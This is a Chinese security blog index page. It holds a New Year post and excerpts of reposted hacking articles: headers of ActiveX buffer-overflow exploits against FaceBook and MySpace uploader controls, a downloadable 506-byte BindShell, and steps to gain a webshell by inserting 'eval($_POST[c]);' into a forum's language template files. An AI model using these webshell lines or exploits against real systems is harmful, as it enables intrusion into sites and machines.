鬼仔's Blog

过年这段时间，回老家玩了几天，就一直没怎么上网，Blog也没更新。
正好更换新服务器，师父说老服务器退休了。
所以这几天一直无法访问，今天终于好了。
开始更新。

新年快乐！
鼠年大吉！

<!–
FaceBook PhotoUploader Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, ImageUploader4.ocx 4.5.57.0(FaceBookPhotoUploader2.cab)
The following controls are also vulnerable:

Aurigma ImageUploader4 4.5.70.0 and 4.5.126.0
—————————–
{6E5E167B-1566-4316-B27F-0DDAB3484CF7}
阅读全文 »

<!–
MySpace Uploader Buffer Overflow Exploit
written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6
MySpaceUploader.ocx version 1.0.0.4: {48DD0448-9209-4F81-9F6D-D83562940134}
Aurigma ImageUploader4.ocx version version 4.5.70.0: {6E5E167B-1566-4316-B27F-0DDAB3484CF7}
Thanks to h.d.m. and the Metasploit crew
–>
<html>
阅读全文 »

作者：Anskya
来源：邪恶八进制

BindShell.体积仅有506字节!!!!
优化到这样估计也很难在优化下去了。。。能写的地方基本上都写满了
这个东西也暂时告一段楼。。。

祝大家新年新气象。。。
开开心心过好年，也为回不了家的朋友们祝福一下
没事，无聊了找兄弟一起吹水看Hot！聊MM。。。
无聊了PM我

下载地址：acom3.rar

文章作者：Ryat （lib3r3t）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：文章首发狼族（www.wolvez.org），后由原创作者有请提交到邪恶八进制，转载请注明原始作者和出处。

如果后台可以在线编辑模板的话，下面的方法就可以拿SHELL了：）

1.后台编辑customfaq(customfaq.lang.php文件)
在<?的后面加上
复制内容到剪贴板
代码:
eval($_POST[c]);
2.后台编辑misc(misc.lang.php文件)
把post_reply_quote对应的内容改为
复制内容到剪贴板
代码:
";eval($_POST[c]);"
在前台回帖处选择引用回复。
简单看下代码：

include/newreply.inc.php 107行：
阅读全文 »

作者：ycosxhack
来源：余弦函数

Flash与时下流行的Flex（Adobe给出的RIA解决方案，我才开始接触:-(）使用的编程语言皆为ActionScript。而JavaScript主要被用于web客户端进行数据的逻辑控制。这两个脚本语言之间的通信模型我称之为ASJS通信盒子。
研究这个，我的目的是给XSS增加点新鲜血液，其中会涉及到XML XSS（本文无）。这次的研究对象为百度空间相册，在空间首页中显示的相册功能模块。虽然有好几次的心跳，但还是没XSS成功~~~不过这次分析还是有收获的。比如：我开始写这篇文章了^^
http://www.xsscos.com/test.php?xss=hello-world这样格式的url不陌生吧？ 阅读全文 »

文章作者：zhuwg
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

先祝大家新年快乐:rose :rose 红包多多

偶写的文章貌似都是看的人少，回复的人更少了，不知道是偶的RP有问题还是文章写的太差了
这次换个题材把 改用武侠小说中的模式来写 正好偶也很想写1回小说了
不知道会不会感兴趣的人多1点咯

江湖自古分久必合 合久必分，自从上次战争结束，江湖武林一直处于群龙无首的状态
于是坛主选定一个吉日，召开武林大会，广招武林豪杰，各大门派纷纷派出门中兄弟

场地选择在郊外的一片空地上，各门派分居一处，当然还有不少小门派武林人士前来挑战
一时场面煞是热烈
坛主宣布，武林大会正式开始，第一项，各大门派自报身份
来自INCA Internet的弟子第一个走上台来，如今INCA Internet门下的GameGuard风头
阅读全文 »